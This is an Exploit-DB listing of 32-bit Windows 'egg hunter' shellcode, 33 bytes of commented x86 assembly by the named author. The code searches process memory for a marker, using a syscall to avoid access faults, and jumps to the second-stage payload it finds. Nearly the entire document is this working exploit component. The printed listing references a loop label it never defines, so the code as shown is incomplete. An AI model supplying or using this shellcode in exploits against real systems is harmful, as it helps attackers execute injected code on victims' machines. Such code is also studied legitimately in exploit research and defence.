win32 eggsearch shellcode 33 bytes

ID EDB-ID:16283
Type exploitdb
Reporter oxff
Modified 2011-03-05T00:00:00


win32 eggsearch shellcode (33 bytes). Shellcode exploit for win32 platform

                                            ; win32 eggsearch shellcode, 33 bytes
; tested on windows xp sp2, should work on all service packs on win2k, win xp, win2k3
; (c) 2009 by Georg 'oxff' Wicherski 

[bits 32]

marker equ 0x1f217767   ; 'gw!\x1f'

 xor edx, edx   ; edx = 0, pointer to examined address

 inc edx    ; edx++, try next address

 test dx, 0x0ffc   ; are we within the first 4 bytes of a page?
 jz address_loop   ; if so, try next address as previous page might be unreadable
     ; and the cmp [edx-4], marker might result in a segmentation fault

 push edx   ; save across syscall
 push byte 8   ; eax = 8, syscall nr of AddAtomA
 pop eax    ; ^
 int 0x2e   ; fire syscall (eax = 8, edx = ptr)
 cmp al, 0x05   ; is result 0xc0000005? (a bit sloppy)
 pop edx    ;

 je address_loop   ; jmp if result was 0xc0000005

 cmp dword [edx-4], marker ; is our egg right before examined address?
 jne address_loop  ; if not, try next address

 inc ebx    ; make sure, zf is not set
 jmp edx    ; we found our egg at [edx-4], so we can jmp to edx